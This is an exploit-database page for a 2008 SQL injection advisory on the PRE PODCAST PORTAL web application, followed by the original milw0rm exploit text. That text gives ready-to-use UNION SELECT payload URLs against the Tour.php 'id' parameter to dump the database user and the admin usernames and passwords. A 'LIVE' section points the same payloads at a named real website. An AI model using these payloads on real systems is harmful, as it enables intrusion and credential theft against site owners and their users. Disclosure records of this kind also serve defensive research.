PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability

vendor:

PRE PODCAST PORTAL

by:

G4N0K

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PRE PODCAST PORTAL

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability

A SQL injection vulnerability exists in PRE PODCAST PORTAL, which allows an attacker to execute arbitrary SQL commands via the 'id' parameter in Tour.php. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the database.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PRE PODCAST PORTAL (Tour.php id) SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:         	PRE PODCAST PORTAL
[~] Language :         	PHP
[~] Website[main]:     	http://www.preproject.com
[~] Website[script]:    http://www.preproject.com/podcast.asp
[~] Type :             	Commercial
[~] Report-Date :     	05/11/2008
[~] Founder :			G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ XPL ]===

[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
[!] http://localhost/[path]/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--


===[ LIVE ]===
[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
[+] http://www.hostnomi.net/newpod/Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--




===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]